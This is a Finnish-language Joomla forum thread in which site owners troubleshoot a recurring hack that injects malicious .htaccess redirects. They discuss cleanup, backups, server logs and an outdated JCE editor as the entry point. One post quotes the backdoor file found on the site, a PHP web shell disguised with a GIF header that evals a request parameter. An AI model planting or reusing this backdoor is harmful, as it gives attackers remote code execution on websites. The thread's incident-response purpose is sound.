.htaccess uudelleenohjaukset pöpösivuille
- Kelpieracer
- Vieras
Just sama versio tästä bakteerista kuin mulla. Äkkiä pois.NonCoder kirjoitti: Kokeilin taas kaikkea mahdollista ja tutkin kaikki hakemistot.
Sivut oli taas siivottu, mutta 30-40min myöhemmin tilanne palautui samaksi.
Latasin äsken varmuuskopion omalle koneelle ja löysin stories kansiosta story.php:n mitä ei ainakaan uudessa Joomla asennuspaketissa ole?
GIF89a1 <?php if (isset($_REQUEST['p1'])) { eval(stripslashes($_REQUEST['p1'])); } else { echo "djeu84m"; } ?>
Muuten: Se ohje, että ihan ekaksi päivittää uuden version Joomlasta saattaa haitata tämän .htaccess-pöpön etsintää? Kun sitten ei niin helposti löydäkään viime päivinä muuttuneita .PHP -tiedostoja.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
- Poissa
- Valvoja
Tuo äskeinen on järjestys jolla minä teen, mutta toki jollakin voi olla parempikin järjestys.
Tuossa tutkimisvaiheessa kannattaa tosiaan käydä laajasti sivusto läpi, sillä tuo pöpö voi olla oikeastaan missä vaan. Minä olen tavannut koodia juuri tuolla kuvakansiossa sekä sivupohjissa (myös niissä jotka eivät ole käytössä), mutta en näe syytä miksi se ei voisi tarttua muuallekin. Olen lukenut, että joskus myös htaccess tiedotoon on tullut muutoksia.
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- TeroKankaanpera
- Poissa
- Valvoja
- JEvents, J2Store 3 ja AdsManager kääntäjä
---
Tero Kankaanperä
terokankaanpera.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
- Aiheen kirjoittaja
- Poissa
- Tulokas
- Viestejä: 15
- Vastaanotettu kiitos 0
Kerkesin päivittää sivun ja otin varmuuskopion vasta sen jälkeen.
Voisin tietysti palauttaa yhden vanhimman kopion, koska sehän ei vaikuta artikkeleihin koska ne on kannassa ja palautan vain tiedostot ja komponentit.
Olen kokeillut vaihtaa kaikki salasanat ja latasin/purin koko sivuhakemiston koneelleni.
Kävin läpi kaikki tiedostot ja löysin vain tuon ylläolevan.
Tyhjensin serveriltä kaikki ja palautin puhdistetun sivuston, mutta sama homma jatkuu.
Ajastetut tehtävät (cron) yms yms olen tarkistanut, mutta joku skriptihän tuolla on koska se palauttaa muokatut tiedostot takaisin aina hetken päästä.
Poistan nyt kaikki tiedostot serveriltä, ja jätän vain tietokannan paikoilleen.
palautan vanhan varmuuskopion ja päivitän kaikki ajantasalle. Katsotaan miten käy.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- quietFinn
- Poissa
- Valvoja
NonCoder kirjoitti:
Olen kokeillut vaihtaa kaikki salasanat ja latasin/purin koko sivuhakemiston koneelleni.
Kävin läpi kaikki tiedostot ja löysin vain tuon ylläolevan.
Tyhjensin serveriltä kaikki ja palautin puhdistetun sivuston, mutta sama homma jatkuu.
Oletko ollut yhteydessä palveluntarjoajaan?
Mielestäni tilanteesi kuulostaa sellaiselta että on syytä epäillä että palvelin on hakkeroitu
Ja vaikka ei olisikaan niin palvelimen lokeista näkee paljon paremmin ja helpommin mitä tililläsi tapahtuu!
netFinn - Taatusti Joomla!-yhteensopiva webhosting: www.netfinn.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
- Aiheen kirjoittaja
- Poissa
- Tulokas
- Viestejä: 15
- Vastaanotettu kiitos 0
Palautan juuri nyt vanhaa ja varmasi puhdasta versiota, joten katsotaan miten käy.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- NonCoder
- Aiheen kirjoittaja
- Poissa
- Tulokas
- Viestejä: 15
- Vastaanotettu kiitos 0
Vielä ei ole mitään tapahtunut, joten jokohan pöpöstä päästiin?
Kaikki on paikoillaan ja ok, mutta muutamia kuvatiedostoja puuttuu..
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- QbiC
- Vieras
Nyt pitäsi olla pomminvarma sivusto
Eilen katselin täältä foorumilta jotain perus kauraa aina suoritettavista toiminnoista mitä pitäisi Joomla sitelle tehdä kun asentelee nettiin ettei haxxata. Täytyypä oikein perehtyä kunnolla.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jmluser
- Vieras
Ajankohdasta pääsin selville tekemällä scriptin joka tarkkailee ajastetusti, muuttuuko .htaccess tiedostojen sisältö verrattuna alkuperäisiin ja jos muuttuu, palauttaa alkuperäiset paikoilleen ja hälyttää sähköpostiin.
Alun perin sisään on nähdäkseni tultu JCE:n kautta, joka oli vanha versio (1.5.7.4). Joomla itsessään 1.5 sarjaa. …/joomla/images/stories –kansioon oli ilmestynyt story.php ja .htaccess tiedosto. Sen jälkeen alkoi ilmetä ylimääräisiä post ja get kutsuja.
Poistin ylimääräiset tiedostot ja nyt tilanne näyttää rauhoittuneen.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- samtzu
- Vieras
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.